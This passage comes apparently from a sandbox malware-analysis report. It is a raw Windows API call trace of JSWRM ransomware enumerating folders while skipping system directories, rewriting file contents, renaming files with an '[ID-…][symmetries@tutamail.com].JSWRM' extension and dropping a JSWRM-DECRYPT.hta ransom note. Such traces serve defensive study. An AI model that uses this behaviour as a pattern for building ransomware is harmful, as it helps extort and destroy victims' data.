lpWideCharStr=0x0) returned 8 [0060.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0060.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0060.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0060.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217bf0 [0060.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0060.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0060.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217bf0 | out: hHeap=0x1e0000) returned 1 [0060.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.212] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0060.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0060.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0060.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0060.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0060.213] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.213] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0060.213] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0060.213] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0060.213] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0060.213] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0060.213] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0060.213] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0060.213] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0060.213] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0060.213] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0060.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0060.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241308, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0060.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0060.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241010, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0060.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0060.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0060.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0060.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0060.213] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.213] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0060.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0060.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0060.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.214] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="3076", cAlternateFileName="")) returned 1 [0060.214] lstrcmpiW (lpString1="3076", lpString2=".") returned 1 [0060.214] lstrcmpiW (lpString1="3076", lpString2="..") returned 1 [0060.214] lstrcmpiW (lpString1="3076", lpString2="...") returned 1 [0060.214] lstrcmpiW (lpString1="3076", lpString2="windows") returned -1 [0060.214] lstrcmpiW (lpString1="3076", lpString2="recovery") returned -1 [0060.214] lstrcmpiW (lpString1="3076", lpString2="perflogs") returned -1 [0060.214] lstrcmpiW (lpString1="3076", lpString2="documents and settings") returned -1 [0060.214] lstrcmpiW (lpString1="3076", lpString2="$RECYCLE.BIN") returned 1 [0060.214] lstrcmpiW (lpString1="3076", lpString2="system volume information") returned -1 [0060.214] lstrcmpiW (lpString1="3076", lpString2="msocache") returned -1 [0060.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0060.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0060.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0060.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0060.214] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\3076\\jswrm-decrypt.hta")) returned 0xffffffff [0060.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0060.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0060.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0060.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0060.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0060.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0060.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0060.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0060.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0060.215] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\3076\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.217] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.217] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0060.218] CloseHandle (hObject=0x450) returned 1 [0060.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0060.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0060.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0060.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0060.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0060.218] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\3076\\jswrm-decrypt.hta")) returned 0x20 [0060.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0060.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.218] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a8cb80d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0060.219] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.219] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a8cb80d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0060.219] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.219] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.219] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.219] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0060.219] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0060.219] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0060.219] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0060.219] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0060.219] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0060.219] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0060.219] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0060.219] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0060.219] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0060.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0060.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0060.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0060.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0060.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0060.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0060.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0060.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0060.220] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.220] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=6309) returned 1 [0060.220] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18a0) returned 0x23dc88 [0060.220] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0x18a0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0x18a0, lpOverlapped=0x0) returned 1 [0060.222] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.222] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0x18a0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0x18a0, lpOverlapped=0x0) returned 1 [0060.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0060.222] CloseHandle (hObject=0x3d4) returned 1 [0060.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0060.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0060.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0060.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0060.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0060.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.223] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0060.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0060.223] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8cb80d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a8cb80d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a8cb80d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0060.223] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0060.223] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0060.223] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0060.223] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0060.223] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0060.223] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0060.223] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0060.223] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0060.223] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0060.223] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0060.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0060.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0060.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0060.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0060.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0060.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0060.224] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.224] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0060.224] lstrcmpiW 